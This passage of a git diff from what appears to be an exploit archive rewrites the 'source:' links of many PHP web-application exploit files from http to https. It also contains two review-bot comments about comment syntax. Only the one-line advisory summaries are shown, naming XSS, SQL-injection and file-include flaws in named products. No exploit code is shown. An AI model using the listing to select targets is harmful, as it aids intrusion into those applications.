@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30557.txt b/exploits/php/webapps/30557.txt index a29ee7406..10e04a88a 100644 --- a/exploits/php/webapps/30557.txt +++ b/exploits/php/webapps/30557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30558.txt b/exploits/php/webapps/30558.txt index 53324c36a..9c4cc868a 100644 --- a/exploits/php/webapps/30558.txt +++ b/exploits/php/webapps/30558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30559.txt b/exploits/php/webapps/30559.txt index f04fc52df..0668a663e 100644 --- a/exploits/php/webapps/30559.txt +++ b/exploits/php/webapps/30559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30560.txt b/exploits/php/webapps/30560.txt index a1dd498a9..7af225b1a 100644 --- a/exploits/php/webapps/30560.txt +++ b/exploits/php/webapps/30560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25526/info +source: https://www.securityfocus.com/bid/25526/info 212cafe Webboard is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
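Review bot: On line 1 of 30556.html the `source:` reference is bare text with no comment markup in the visible lines, and the 30379.html and 30488.php hunks show the same. In an .html file that line is rendered as page content, and in a .php file text outside a PHP tag is emitted as output. Since this pass rewrites that line anyway, consider wrapping it in the comment syntax of the file type so the provenance header stays out of what the file renders or prints.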
diff --git a/exploits/php/webapps/30568.txt b/exploits/php/webapps/30568.txt index af911fab1..5123d2b0a 100644 --- a/exploits/php/webapps/30568.txt +++ b/exploits/php/webapps/30568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25575/info +source: https://www.securityfocus.com/bid/25575/info Pulsewiki and Pawfaliki are prone to a local file-include vulnerability because the software fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30570.txt b/exploits/php/webapps/30570.txt index 9aa864f16..94e149629 100644 --- a/exploits/php/webapps/30570.txt +++ b/exploits/php/webapps/30570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25598/info +source: https://www.securityfocus.com/bid/25598/info Toms Gastebuch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30572.txt b/exploits/php/webapps/30572.txt index 3a34b79d5..b80de37b9 100644 --- a/exploits/php/webapps/30572.txt +++ b/exploits/php/webapps/30572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25615/info +source: https://www.securityfocus.com/bid/25615/info phpMyQuote is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and an SQL-injection issue, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/30573.txt b/exploits/php/webapps/30573.txt index e895a884b..500e8386a 100644 --- a/exploits/php/webapps/30573.txt +++ b/exploits/php/webapps/30573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25617/info +source: https://www.securityfocus.com/bid/25617/info Sisfo Kampus is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30575.txt b/exploits/php/webapps/30575.txt index 1d7862ee6..f362293ec 100644 --- a/exploits/php/webapps/30575.txt 
+++ b/exploits/php/webapps/30575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25644/info +source: https://www.securityfocus.com/bid/25644/info BOINC (Berkeley Open Infrastructure for Network Computing) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30576.txt b/exploits/php/webapps/30576.txt index ebec1f14d..50819436a 100644 --- a/exploits/php/webapps/30576.txt +++ b/exploits/php/webapps/30576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25644/info +source: https://www.securityfocus.com/bid/25644/info BOINC (Berkeley Open Infrastructure for Network Computing) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30577.txt b/exploits/php/webapps/30577.txt index 52463a150..4fbad4b37 100644 --- a/exploits/php/webapps/30577.txt +++ b/exploits/php/webapps/30577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25646/info +source: https://www.securityfocus.com/bid/25646/info Plesk is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. diff --git a/exploits/php/webapps/30581.txt b/exploits/php/webapps/30581.txt index c3a96044a..20c48d1c0 100644 --- a/exploits/php/webapps/30581.txt +++ b/exploits/php/webapps/30581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25652/info +source: https://www.securityfocus.com/bid/25652/info CS-Guestbook is prone to an information-disclosure vulnerability because the application fails to properly protect sensitive information. diff --git a/exploits/php/webapps/30583.txt b/exploits/php/webapps/30583.txt index 1dc3740da..ebd59d2ef 100644 --- a/exploits/php/webapps/30583.txt +++ b/exploits/php/webapps/30583.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25674/info +source: https://www.securityfocus.com/bid/25674/info Php-Stats is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30588.txt b/exploits/php/webapps/30588.txt index bf47558b9..a24773816 100644 --- a/exploits/php/webapps/30588.txt +++ b/exploits/php/webapps/30588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25683/info +source: https://www.securityfocus.com/bid/25683/info ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/30594.txt b/exploits/php/webapps/30594.txt index 404b7b836..426f468a7 100644 --- a/exploits/php/webapps/30594.txt +++ b/exploits/php/webapps/30594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25698/info +source: https://www.securityfocus.com/bid/25698/info Coppermine Photo Gallery is prone to a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/30595.txt b/exploits/php/webapps/30595.txt index 783e3e5b6..cf38e94e2 100644 --- a/exploits/php/webapps/30595.txt +++ b/exploits/php/webapps/30595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25698/info +source: https://www.securityfocus.com/bid/25698/info Coppermine Photo Gallery is prone to a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/30596.txt b/exploits/php/webapps/30596.txt index d4b40d75e..39eed1232 100644 --- a/exploits/php/webapps/30596.txt +++ b/exploits/php/webapps/30596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25699/info +source: https://www.securityfocus.com/bid/25699/info b1gMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/30601.txt b/exploits/php/webapps/30601.txt index de23b2484..75db2a762 100644 --- a/exploits/php/webapps/30601.txt +++ b/exploits/php/webapps/30601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25752/info +source: https://www.securityfocus.com/bid/25752/info The Vigile CMS wiki module is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30602.html b/exploits/php/webapps/30602.html index 9dbf7f543..bcb31f8ae 100644 --- a/exploits/php/webapps/30602.html +++ b/exploits/php/webapps/30602.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25769/info +source: https://www.securityfocus.com/bid/25769/info WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30603.html b/exploits/php/webapps/30603.html index 9cdadda71..04622c76b 100644 --- a/exploits/php/webapps/30603.html +++ b/exploits/php/webapps/30603.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25771/info +source: https://www.securityfocus.com/bid/25771/info Xcms is prone to a vulnerability that lets attackers execute arbitrary PHP code because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30607.txt b/exploits/php/webapps/30607.txt index 5bfe6a7fb..8cb177695 100644 --- a/exploits/php/webapps/30607.txt +++ b/exploits/php/webapps/30607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25790/info +source: https://www.securityfocus.com/bid/25790/info The 'bcoos' Arcade module is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30614.txt b/exploits/php/webapps/30614.txt index 991d270cc..7588b54a8 100644 --- a/exploits/php/webapps/30614.txt 
+++ b/exploits/php/webapps/30614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25806/info +source: https://www.securityfocus.com/bid/25806/info Dance Music is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30615.txt b/exploits/php/webapps/30615.txt index 397f36b6d..e96676a95 100644 --- a/exploits/php/webapps/30615.txt +++ b/exploits/php/webapps/30615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25808/info +source: https://www.securityfocus.com/bid/25808/info SimpGB is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30616.txt b/exploits/php/webapps/30616.txt index e57aacf54..44e0c947e 100644 --- a/exploits/php/webapps/30616.txt +++ b/exploits/php/webapps/30616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25808/info +source: https://www.securityfocus.com/bid/25808/info SimpGB is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30617.txt b/exploits/php/webapps/30617.txt index c81d62e2c..6323dc198 100644 --- a/exploits/php/webapps/30617.txt +++ b/exploits/php/webapps/30617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25809/info +source: https://www.securityfocus.com/bid/25809/info SimpNews is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30618.txt b/exploits/php/webapps/30618.txt index dd0323d05..21be1ea2b 100644 --- a/exploits/php/webapps/30618.txt +++ b/exploits/php/webapps/30618.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25809/info +source: https://www.securityfocus.com/bid/25809/info SimpNews is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30623.pl b/exploits/php/webapps/30623.pl index c4aefa7d6..1be8c3747 100755 --- a/exploits/php/webapps/30623.pl +++ b/exploits/php/webapps/30623.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25864/info +source: https://www.securityfocus.com/bid/25864/info MD-Pro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30632.txt b/exploits/php/webapps/30632.txt index 8064a888e..47dfd557c 100644 --- a/exploits/php/webapps/30632.txt +++ b/exploits/php/webapps/30632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25911/info +source: https://www.securityfocus.com/bid/25911/info DRBGuestbook is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30633.txt b/exploits/php/webapps/30633.txt index 45e1260dc..a8f914da8 100644 --- a/exploits/php/webapps/30633.txt +++ b/exploits/php/webapps/30633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25912/info +source: https://www.securityfocus.com/bid/25912/info UebiMiau is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30634.txt b/exploits/php/webapps/30634.txt index 3501bdcc3..9255a4811 100644 --- a/exploits/php/webapps/30634.txt +++ b/exploits/php/webapps/30634.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25914/info +source: https://www.securityfocus.com/bid/25914/info Content*Builder (C*B) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30637.js b/exploits/php/webapps/30637.js index 1795debe3..171b00efe 100644 --- a/exploits/php/webapps/30637.js +++ b/exploits/php/webapps/30637.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25921/info +source: https://www.securityfocus.com/bid/25921/info FeedBurner FeedSmith is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/php/webapps/30638.txt b/exploits/php/webapps/30638.txt index 96783e957..e9643a3ab 100644 --- a/exploits/php/webapps/30638.txt +++ b/exploits/php/webapps/30638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25923/info +source: https://www.securityfocus.com/bid/25923/info GForge is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. A fix is available from the vendor. diff --git a/exploits/php/webapps/30640.txt b/exploits/php/webapps/30640.txt index 9550b1eb4..323c95185 100644 --- a/exploits/php/webapps/30640.txt +++ b/exploits/php/webapps/30640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25931/info +source: https://www.securityfocus.com/bid/25931/info Stuffed Tracker is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30641.txt b/exploits/php/webapps/30641.txt index 1f4e89a77..1fc923b47 100644 --- a/exploits/php/webapps/30641.txt +++ b/exploits/php/webapps/30641.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25942/info +source: https://www.securityfocus.com/bid/25942/info MailBee WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30642.txt b/exploits/php/webapps/30642.txt index 0a7a1ddb1..0d3324231 100644 --- a/exploits/php/webapps/30642.txt +++ b/exploits/php/webapps/30642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25942/info +source: https://www.securityfocus.com/bid/25942/info MailBee WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30647.txt b/exploits/php/webapps/30647.txt index 10e81e51e..bec3eeebc 100644 --- a/exploits/php/webapps/30647.txt +++ b/exploits/php/webapps/30647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25963/info +source: https://www.securityfocus.com/bid/25963/info SNewsCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30651.txt b/exploits/php/webapps/30651.txt index 0383a31b8..a314b5663 100644 --- a/exploits/php/webapps/30651.txt +++ b/exploits/php/webapps/30651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25999/info +source: https://www.securityfocus.com/bid/25999/info Webmaster-Tips.net Joomla! RSS Feed Reader is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30653.txt b/exploits/php/webapps/30653.txt index c80e852e7..75198df8e 100644 --- a/exploits/php/webapps/30653.txt +++ b/exploits/php/webapps/30653.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26020/info +source: https://www.securityfocus.com/bid/26020/info phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30654.txt b/exploits/php/webapps/30654.txt index 32f837c2d..f2c8d174f 100644 --- a/exploits/php/webapps/30654.txt +++ b/exploits/php/webapps/30654.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26027/info +source: https://www.securityfocus.com/bid/26027/info ActiveKB NX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30655.txt b/exploits/php/webapps/30655.txt index add92d981..87f388c81 100644 --- a/exploits/php/webapps/30655.txt +++ b/exploits/php/webapps/30655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26031/info +source: https://www.securityfocus.com/bid/26031/info The Joomla! Search component is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30656.txt b/exploits/php/webapps/30656.txt index ebb20d17b..4f2271873 100644 --- a/exploits/php/webapps/30656.txt +++ b/exploits/php/webapps/30656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26032/info +source: https://www.securityfocus.com/bid/26032/info boastMachine is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30657.txt b/exploits/php/webapps/30657.txt index 09a818312..06dd130fa 100644 --- a/exploits/php/webapps/30657.txt +++ b/exploits/php/webapps/30657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26033/info +source: https://www.securityfocus.com/bid/26033/info UMI CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. 
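Review bot: In exploits/php/webapps/30623.pl (mode 100755) and exploits/php/webapps/30637.js, the `source:` line being rewritten is line 1 of a script file and has no comment marker in either the removed or the added version, and the description line that follows it in the hunk context is bare prose as well, so an interpreter would read the header as code. Since the change already touches that line, consider prefixing it with the file's comment syntax (`# source: ...` in the .pl file, `// source: ...` in the .js file) and doing the same for the description lines, or note in the commit message that these headers are deliberately left as plain text. The scheme change itself is otherwise uniform across these hunks.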
diff --git a/exploits/php/webapps/30658.txt b/exploits/php/webapps/30658.txt index c3cebcba4..1e8872781 100644 --- a/exploits/php/webapps/30658.txt +++ b/exploits/php/webapps/30658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26034/info +source: https://www.securityfocus.com/bid/26034/info CRS Manager is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30659.txt b/exploits/php/webapps/30659.txt index 647ae08f7..c971023c7 100644 --- a/exploits/php/webapps/30659.txt +++ b/exploits/php/webapps/30659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26035/info +source: https://www.securityfocus.com/bid/26035/info Nucleus CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30660.txt b/exploits/php/webapps/30660.txt index b150ea5bd..b7c975b00 100644 --- a/exploits/php/webapps/30660.txt +++ b/exploits/php/webapps/30660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26036/info +source: https://www.securityfocus.com/bid/26036/info Stride 1.0 Courses is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30662.txt b/exploits/php/webapps/30662.txt index 145c85a91..4dc794250 100644 --- a/exploits/php/webapps/30662.txt +++ b/exploits/php/webapps/30662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26041/info +source: https://www.securityfocus.com/bid/26041/info Scott Manktelow Design Stride 1.0 Content Management System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30663.txt b/exploits/php/webapps/30663.txt index 40e1d5cb8..87e09f9d5 100644 
--- a/exploits/php/webapps/30663.txt +++ b/exploits/php/webapps/30663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26045/info +source: https://www.securityfocus.com/bid/26045/info Linkliste is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30664.txt b/exploits/php/webapps/30664.txt index 4a4b2a2ec..7a94431bf 100644 --- a/exploits/php/webapps/30664.txt +++ b/exploits/php/webapps/30664.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26046/info +source: https://www.securityfocus.com/bid/26046/info Scott Manktelow Design Stride 1.0 Merchant is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30682.txt b/exploits/php/webapps/30682.txt index 31c956e6e..0507e1982 100644 --- a/exploits/php/webapps/30682.txt +++ b/exploits/php/webapps/30682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30683.txt b/exploits/php/webapps/30683.txt index d8a8ed486..e275995f3 100644 --- a/exploits/php/webapps/30683.txt +++ b/exploits/php/webapps/30683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30684.txt b/exploits/php/webapps/30684.txt index a21b63bc2..02aa9d257 100644 --- a/exploits/php/webapps/30684.txt +++ b/exploits/php/webapps/30684.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30685.txt b/exploits/php/webapps/30685.txt index 01b744b4d..9d36f41f1 100644 --- a/exploits/php/webapps/30685.txt +++ b/exploits/php/webapps/30685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30686.txt b/exploits/php/webapps/30686.txt index 634e4a5d2..75be80986 100644 --- a/exploits/php/webapps/30686.txt +++ b/exploits/php/webapps/30686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26126/info +source: https://www.securityfocus.com/bid/26126/info SiteBar is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30691.txt b/exploits/php/webapps/30691.txt index cef71cdbf..845af5d96 100644 --- a/exploits/php/webapps/30691.txt +++ b/exploits/php/webapps/30691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26128/info +source: https://www.securityfocus.com/bid/26128/info OmniVista 4760 is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30693.txt b/exploits/php/webapps/30693.txt index 1daba8a4f..21ec14d27 100644 --- a/exploits/php/webapps/30693.txt +++ b/exploits/php/webapps/30693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26136/info +source: https://www.securityfocus.com/bid/26136/info SocketKB is prone to multiple cross-site scripting vulnerabilities. 
diff --git a/exploits/php/webapps/30694.txt b/exploits/php/webapps/30694.txt index c0413198d..ae0f490f1 100644 --- a/exploits/php/webapps/30694.txt +++ b/exploits/php/webapps/30694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26138/info +source: https://www.securityfocus.com/bid/26138/info SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30695.txt b/exploits/php/webapps/30695.txt index c023a57bf..f060699d6 100644 --- a/exploits/php/webapps/30695.txt +++ b/exploits/php/webapps/30695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26140/info +source: https://www.securityfocus.com/bid/26140/info rNote is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30697.txt b/exploits/php/webapps/30697.txt index 4aeb0d7ab..a0f9433ca 100644 --- a/exploits/php/webapps/30697.txt +++ b/exploits/php/webapps/30697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26143/info +source: https://www.securityfocus.com/bid/26143/info ReloadCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30698.txt b/exploits/php/webapps/30698.txt index d9f30e29f..d8c57e409 100644 --- a/exploits/php/webapps/30698.txt +++ b/exploits/php/webapps/30698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26155/info +source: https://www.securityfocus.com/bid/26155/info Flatnuke3 is prone to an unauthorized-access vulnerability because it fails to adequately verify administrative credentials while logging in via the 'File Manager' module. diff --git a/exploits/php/webapps/30699.txt b/exploits/php/webapps/30699.txt index d020cabba..98c23c293 100644 --- a/exploits/php/webapps/30699.txt +++ b/exploits/php/webapps/30699.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26167/info +source: https://www.securityfocus.com/bid/26167/info Hackish is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30700.txt b/exploits/php/webapps/30700.txt index 9d68d6052..d707400d8 100644 --- a/exploits/php/webapps/30700.txt +++ b/exploits/php/webapps/30700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26169/info +source: https://www.securityfocus.com/bid/26169/info DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30701.txt b/exploits/php/webapps/30701.txt index 25d009a9d..0ec7ffbcd 100644 --- a/exploits/php/webapps/30701.txt +++ b/exploits/php/webapps/30701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26171/info +source: https://www.securityfocus.com/bid/26171/info Jeebles Directory is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30703.txt b/exploits/php/webapps/30703.txt index c1108fe8a..e86b4f79d 100644 --- a/exploits/php/webapps/30703.txt +++ b/exploits/php/webapps/30703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26179/info +source: https://www.securityfocus.com/bid/26179/info Japanese PHP Gallery Hosting is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/php/webapps/30707.txt b/exploits/php/webapps/30707.txt index fb23bb8d1..dd3e27b4e 100644 --- a/exploits/php/webapps/30707.txt +++ b/exploits/php/webapps/30707.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26194/info +source: https://www.securityfocus.com/bid/26194/info basicFramework is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30712.txt b/exploits/php/webapps/30712.txt index 1c8e79a8b..a52d76822 100644 --- a/exploits/php/webapps/30712.txt +++ b/exploits/php/webapps/30712.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26213/info +source: https://www.securityfocus.com/bid/26213/info Multi-Forums is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. diff --git a/exploits/php/webapps/30715.txt b/exploits/php/webapps/30715.txt index 70044f37d..c88adfc3e 100644 --- a/exploits/php/webapps/30715.txt +++ b/exploits/php/webapps/30715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26228/info +source: https://www.securityfocus.com/bid/26228/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30716.txt b/exploits/php/webapps/30716.txt index 7b512dec9..1cd4a3806 100644 --- a/exploits/php/webapps/30716.txt +++ b/exploits/php/webapps/30716.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26232/info +source: https://www.securityfocus.com/bid/26232/info SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30717.txt b/exploits/php/webapps/30717.txt index f0d936a61..968a74c6e 100644 --- a/exploits/php/webapps/30717.txt +++ b/exploits/php/webapps/30717.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26234/info +source: https://www.securityfocus.com/bid/26234/info Omnistar Live is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30718.txt b/exploits/php/webapps/30718.txt index 1e5a2af0f..f767f2b81 100644 --- a/exploits/php/webapps/30718.txt +++ b/exploits/php/webapps/30718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26237/info +source: https://www.securityfocus.com/bid/26237/info Saxon is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30719.txt b/exploits/php/webapps/30719.txt index 9793bc31a..3a1fc6868 100644 --- a/exploits/php/webapps/30719.txt +++ b/exploits/php/webapps/30719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26238/info +source: https://www.securityfocus.com/bid/26238/info Saxon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30731.txt b/exploits/php/webapps/30731.txt index e826c0223..298fea80e 100644 --- a/exploits/php/webapps/30731.txt +++ b/exploits/php/webapps/30731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26289/info +source: https://www.securityfocus.com/bid/26289/info Synergiser is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30732.txt b/exploits/php/webapps/30732.txt index d965ef47f..5dd9e4041 100644 --- a/exploits/php/webapps/30732.txt +++ b/exploits/php/webapps/30732.txt 